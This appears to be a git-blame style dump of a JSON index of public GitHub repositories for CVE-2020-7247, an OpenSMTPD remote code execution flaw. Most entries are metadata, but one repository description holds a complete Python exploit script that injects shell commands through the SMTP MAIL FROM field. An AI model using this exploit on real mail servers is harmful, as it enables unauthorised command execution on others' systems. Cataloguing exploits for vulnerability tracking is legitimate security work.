2021-01-31 12:09:38 +09:00
[
2021-08-29 12:12:05 +09:00
{
"id" : 237289178 ,
"name" : "cve-2020-7247-exploit" ,
"full_name" : "FiroSolutions\/cve-2020-7247-exploit" ,
"owner" : {
"login" : "FiroSolutions" ,
"id" : 43434507 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/43434507?v=4" ,
"html_url" : "https:\/\/github.com\/FiroSolutions"
} ,
"html_url" : "https:\/\/github.com\/FiroSolutions\/cve-2020-7247-exploit" ,
"description" : "Python exploit of cve-2020-7247" ,
"fork" : false ,
"created_at" : "2020-01-30T19:29:27Z" ,
2022-01-07 03:15:16 +09:00
"updated_at" : "2022-01-06T12:32:04Z" ,
2021-08-29 12:12:05 +09:00
"pushed_at" : "2020-02-19T10:55:15Z" ,
2022-01-07 03:15:16 +09:00
"stargazers_count" : 25 ,
"watchers_count" : 25 ,
2021-11-20 03:13:08 +09:00
"forks_count" : 17 ,
2021-09-14 06:12:57 +09:00
"allow_forking" : true ,
2021-10-07 06:13:51 +09:00
"is_template" : false ,
"topics" : [ ] ,
2021-10-02 06:13:10 +09:00
"visibility" : "public" ,
2021-11-20 03:13:08 +09:00
"forks" : 17 ,
2022-01-07 03:15:16 +09:00
"watchers" : 25 ,
2021-08-29 12:12:05 +09:00
"score" : 0
} ,
{
"id" : 241011451 ,
"name" : "cve-2020-7247" ,
"full_name" : "superzerosec\/cve-2020-7247" ,
"owner" : {
"login" : "superzerosec" ,
"id" : 57648217 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4" ,
"html_url" : "https:\/\/github.com\/superzerosec"
} ,
"html_url" : "https:\/\/github.com\/superzerosec\/cve-2020-7247" ,
"description" : "OpenSMTPD version 6.6.2 remote code execution exploit" ,
"fork" : false ,
"created_at" : "2020-02-17T03:28:09Z" ,
2021-12-06 09:13:08 +09:00
"updated_at" : "2021-12-05T21:34:44Z" ,
2022-01-16 09:13:45 +09:00
"pushed_at" : "2022-01-15T19:37:31Z" ,
2021-12-06 09:13:08 +09:00
"stargazers_count" : 3 ,
"watchers_count" : 3 ,
2022-01-16 09:13:45 +09:00
"forks_count" : 8 ,
2021-09-14 06:12:57 +09:00
"allow_forking" : true ,
2021-10-07 06:13:51 +09:00
"is_template" : false ,
"topics" : [ ] ,
2021-10-02 06:13:10 +09:00
"visibility" : "public" ,
2022-01-16 09:13:45 +09:00
"forks" : 8 ,
2021-12-06 09:13:08 +09:00
"watchers" : 3 ,
2021-08-29 12:12:05 +09:00
"score" : 0
} ,
{
"id" : 241337606 ,
"name" : "CVE-2020-7247" ,
"full_name" : "r0lh\/CVE-2020-7247" ,
"owner" : {
"login" : "r0lh" ,
"id" : 51697374 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/51697374?v=4" ,
"html_url" : "https:\/\/github.com\/r0lh"
} ,
"html_url" : "https:\/\/github.com\/r0lh\/CVE-2020-7247" ,
"description" : "Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD < 6.6.2" ,
"fork" : false ,
"created_at" : "2020-02-18T10:52:38Z" ,
2021-12-06 09:13:08 +09:00
"updated_at" : "2021-12-05T21:34:44Z" ,
2021-08-29 12:12:05 +09:00
"pushed_at" : "2020-02-18T11:08:38Z" ,
2021-12-06 09:13:08 +09:00
"stargazers_count" : 4 ,
"watchers_count" : 4 ,
"forks_count" : 1 ,
2021-09-14 06:12:57 +09:00
"allow_forking" : true ,
2021-10-07 06:13:51 +09:00
"is_template" : false ,
"topics" : [ ] ,
2021-10-02 06:13:10 +09:00
"visibility" : "public" ,
2021-12-06 09:13:08 +09:00
"forks" : 1 ,
"watchers" : 4 ,
2021-08-29 12:12:05 +09:00
"score" : 0
} ,
2021-02-02 00:10:08 +09:00
{
"id" : 334951447 ,
"name" : "CVE-2020-7247" ,
"full_name" : "jopraveen\/CVE-2020-7247" ,
"owner" : {
"login" : "jopraveen" ,
"id" : 56404692 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/56404692?v=4" ,
"html_url" : "https:\/\/github.com\/jopraveen"
} ,
"html_url" : "https:\/\/github.com\/jopraveen\/CVE-2020-7247" ,
"description" : "This vulnerability exists in OpenBSD’ ’ ,
"fork" : false ,
"created_at" : "2021-02-01T13:01:21Z" ,
"updated_at" : "2021-02-01T13:20:48Z" ,
"pushed_at" : "2021-02-01T13:20:06Z" ,
"stargazers_count" : 1 ,
"watchers_count" : 1 ,
2021-11-12 21:13:39 +09:00
"forks_count" : 3 ,
2021-09-14 06:12:57 +09:00
"allow_forking" : true ,
2021-10-07 06:13:51 +09:00
"is_template" : false ,
"topics" : [ ] ,
2021-10-02 06:13:10 +09:00
"visibility" : "public" ,
2021-11-12 21:13:39 +09:00
"forks" : 3 ,
2021-02-02 00:10:08 +09:00
"watchers" : 1 ,
"score" : 0
2021-02-13 18:09:17 +09:00
} ,
{
"id" : 338516393 ,
"name" : "CVE-2020-7247-exploit" ,
"full_name" : "QTranspose\/CVE-2020-7247-exploit" ,
"owner" : {
"login" : "QTranspose" ,
"id" : 54239699 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/54239699?v=4" ,
"html_url" : "https:\/\/github.com\/QTranspose"
} ,
"html_url" : "https:\/\/github.com\/QTranspose\/CVE-2020-7247-exploit" ,
"description" : "OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit" ,
"fork" : false ,
"created_at" : "2021-02-13T06:57:47Z" ,
2022-01-04 21:14:11 +09:00
"updated_at" : "2022-01-04T07:09:21Z" ,
2021-02-18 00:09:10 +09:00
"pushed_at" : "2021-02-17T09:23:57Z" ,
2022-01-04 21:14:11 +09:00
"stargazers_count" : 6 ,
"watchers_count" : 6 ,
2021-02-19 00:09:07 +09:00
"forks_count" : 1 ,
2021-09-14 06:12:57 +09:00
"allow_forking" : true ,
2021-10-07 06:13:51 +09:00
"is_template" : false ,
"topics" : [ ] ,
2021-10-02 06:13:10 +09:00
"visibility" : "public" ,
2021-02-19 00:09:07 +09:00
"forks" : 1 ,
2022-01-04 21:14:11 +09:00
"watchers" : 6 ,
2021-02-13 18:09:17 +09:00
"score" : 0
2021-06-19 18:12:28 +09:00
} ,
{
"id" : 378352740 ,
"name" : "CVE-2020-7247" ,
"full_name" : "f4T1H21\/CVE-2020-7247" ,
"owner" : {
"login" : "f4T1H21" ,
"id" : 83399767 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/83399767?v=4" ,
"html_url" : "https:\/\/github.com\/f4T1H21"
} ,
"html_url" : "https:\/\/github.com\/f4T1H21\/CVE-2020-7247" ,
"description" : "PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 < 6.6.1 Remote Code Execution" ,
"fork" : false ,
"created_at" : "2021-06-19T07:34:42Z" ,
2021-07-11 00:11:29 +09:00
"updated_at" : "2021-07-10T11:26:09Z" ,
"pushed_at" : "2021-07-10T11:26:06Z" ,
2021-06-19 18:12:28 +09:00
"stargazers_count" : 1 ,
"watchers_count" : 1 ,
2021-12-04 09:13:00 +09:00
"forks_count" : 0 ,
2021-09-14 06:12:57 +09:00
"allow_forking" : true ,
2021-10-07 06:13:51 +09:00
"is_template" : false ,
"topics" : [
"cve" ,
"cve-2020-7247" ,
"exploit" ,
"poc"
] ,
2021-10-02 06:13:10 +09:00
"visibility" : "public" ,
2021-12-04 09:13:00 +09:00
"forks" : 0 ,
2021-06-19 18:12:28 +09:00
"watchers" : 1 ,
"score" : 0
2021-10-17 12:13:26 +09:00
} ,
{
"id" : 417960626 ,
"name" : "OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit" ,
"full_name" : "Sergio928\/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit" ,
"owner" : {
"login" : "Sergio928" ,
"id" : 76630472 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/76630472?v=4" ,
"html_url" : "https:\/\/github.com\/Sergio928"
} ,
"html_url" : "https:\/\/github.com\/Sergio928\/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit" ,
"description" : "EDB-ID: 47984 CVE: 2020-7247 EDB Verified: Author: 1F98D Type: REMOTE Exploit: \/ Platform: LINUX Date: 2020-01-30 Vulnerable App: # Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https:\/\/www.opensmtpd.org\/ # Software Link: https:\/\/github.com\/OpenSMTPD\/OpenSMTPD\/releases\/tag\/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https:\/\/www.openwall.com\/lists\/oss-security\/2020\/01\/28\/3 # # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. # #!\/usr\/local\/bin\/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0])) print(\"E.g. {} 127.0.0.1 25 'touch \/tmp\/x'\".format(sys.argv[0])) sys.exit(1) ADDR = sys.argv[1] PORT = int(sys.argv[2]) CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((ADDR, PORT)) res = s.recv(1024) if 'OpenSMTPD' not in str(res): print('[!] No OpenSMTPD detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] OpenSMTPD detected') s.send(b'HELO x\\r\\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Connected, sending payload') s.send(bytes('MAIL FROM:<;{};>\\r\\n'.format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Payload sent') s.send(b'RCPT TO:<root>\\r\\n') s.recv(1024) s.send(b'DATA\\r\\n') s.recv(1024) s.send(b'\\r\\nxxx\\r\\n.\\r\\n') s.recv(1024) s.send(b'QUIT\\r\\n') s.recv(1024) print('[*] Done') " ,
"fork" : false ,
"created_at" : "2021-10-16T22:10:47Z" ,
2021-10-18 00:12:49 +09:00
"updated_at" : "2021-10-17T10:13:31Z" ,
2021-10-17 12:13:26 +09:00
"pushed_at" : "2021-10-16T22:10:48Z" ,
2021-10-18 00:12:49 +09:00
"stargazers_count" : 0 ,
"watchers_count" : 0 ,
2021-10-17 12:13:26 +09:00
"forks_count" : 0 ,
"allow_forking" : true ,
"is_template" : false ,
"topics" : [ ] ,
"visibility" : "public" ,
"forks" : 0 ,
2021-10-18 00:12:49 +09:00
"watchers" : 0 ,
2021-10-17 12:13:26 +09:00
"score" : 0
2021-11-27 03:13:03 +09:00
} ,
{
"id" : 432255271 ,
"name" : "CVE-2020-7247-POC" ,
"full_name" : "SimonSchoeni\/CVE-2020-7247-POC" ,
"owner" : {
"login" : "SimonSchoeni" ,
"id" : 62761108 ,
"avatar_url" : "https:\/\/avatars.githubusercontent.com\/u\/62761108?v=4" ,
"html_url" : "https:\/\/github.com\/SimonSchoeni"
} ,
"html_url" : "https:\/\/github.com\/SimonSchoeni\/CVE-2020-7247-POC" ,
"description" : "Proof of concept for CVE-2020-7247 for educational purposes." ,
"fork" : false ,
"created_at" : "2021-11-26T17:28:56Z" ,
2021-12-29 03:13:43 +09:00
"updated_at" : "2021-12-28T12:54:32Z" ,
"pushed_at" : "2021-12-28T12:54:29Z" ,
2021-11-30 21:14:49 +09:00
"stargazers_count" : 1 ,
"watchers_count" : 1 ,
2021-11-27 03:13:03 +09:00
"forks_count" : 0 ,
"allow_forking" : true ,
"is_template" : false ,
"topics" : [ ] ,
"visibility" : "public" ,
"forks" : 0 ,
2021-11-30 21:14:49 +09:00
"watchers" : 1 ,
2021-11-27 03:13:03 +09:00
"score" : 0
2021-01-31 12:09:38 +09:00
}
]
